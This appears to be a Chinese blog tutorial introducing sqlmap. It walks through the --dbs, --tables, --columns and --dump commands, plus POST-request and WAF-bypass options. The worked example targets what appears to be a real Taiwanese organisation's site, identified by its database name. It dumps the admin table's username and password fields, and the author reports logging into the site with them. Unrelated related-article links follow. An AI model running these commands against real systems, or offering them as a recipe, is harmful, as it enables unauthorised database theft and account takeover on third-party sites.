当前位置: 首页 > news >正文

sqlmap使用入门

sqlmap加速了sql注入的发展,需要掌握6点,其一是--dbs获得数据库名称,其二是-D 数据库名称 --tables 获得数据库中的所有表名,其三是-D 数据库名 -T 表名 -C 字段1,字段2 --dump 获得数据库中的表中的字段的值,其四是-r POST请求.txt针对POST请求进行sql注入,其五是已知数据库用--dbms MYSQL进行漏洞探测,其六是使用--tamper变形载核绕过WAF。ailx10 预祝大家:2023护网取得好成绩~

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

sqlmap注入,获得数据库名称(--dbs

sqlmap -u "https://****" --dbs

sqlmap注入,获得数据库中的所有表名(-D 数据库名称 --tables

sqlmap -u "https://***" -D toaa2001_org_tw --tables

sqlmap注入,获得数据库中的表中的所有字段(-D 数据库名 -T 表名 --columns

sqlmap -u "https://***" -D toaa2001_org_tw -T admin --columns

sqlmap注入,获得数据库中的表中的字段的值(-D 数据库名 -T 表名 -C 字段1,字段2 --dump

sqlmap -u "https://***" -D toaa2001_org_tw -T admin -C A_Pass,A_User --dump

使用账号和密码登录网站

登录网站成功,sqlmap就是这么朴实无华,且枯燥

已开启送礼物

http://www.xdnf.cn/news/405451.html

相关文章:

  • Linux 系统中设置开机启动脚本
  • AAAI-2025 | 中科院无人机导航新突破!FELA:基于细粒度对齐的无人机视觉对话导航
  • 【JAVA】业务系统订单号,流水号生成规则工具类
  • python练习-20250512
  • C++23 views::slide (P2442R1) 深入解析
  • AnaTraf:深度解析网络性能分析(NPM)
  • C语言:深入理解指针(3)
  • 基于 Nexus 在 Dockerfile 配置 yum, conda, pip 仓库的方法和参考
  • T2000云腾边缘计算盒子在数猪场景中的应用|YOLOv8+NodeRED
  • 湖北理元理律师事务所:企业债务危机的“止血”与“造血”平衡术
  • 01背包和完全背包
  • 基于Qt6 + MuPDF在 Arm IMX6ULL运行的PDF浏览器——MuPDF Tools
  • 大项目k8s集群有多大规模,多少节点,有多少pod
  • 智能指针入门:深入理解 C++ 的 shared_ptr
  • AI中的MCP是什么?MCP的作用及未来方向预测 (使用go-zero 快速搭建MCP服务器)
  • 2025年北京市积分落户申报
  • 经典案例 | 智能眼镜中瞳距调节和近视调节的应用
  • web 自动化之 Unittest 四大组件
  • 【NextPilot日志移植】ULog
  • 文档外发安全:企业数据防护的最后一道防线
  • RabbitMQ 工作模式
  • JWT的介绍与在Fastapi框架中的应用
  • 单片机-STM32部分:13-1、蜂鸣器
  • 常用依赖文件库
  • kubernetes服务自动伸缩-VPA
  • ESP32开发入门(九):HTTP服务器开发实践
  • Day22打卡-复习
  • 【K8S学习之探针】详细了解就绪探针 readinessProbe 和存活探针 livenessProbe 的配置
  • Kotlin 异步初始化值
  • JVM类加载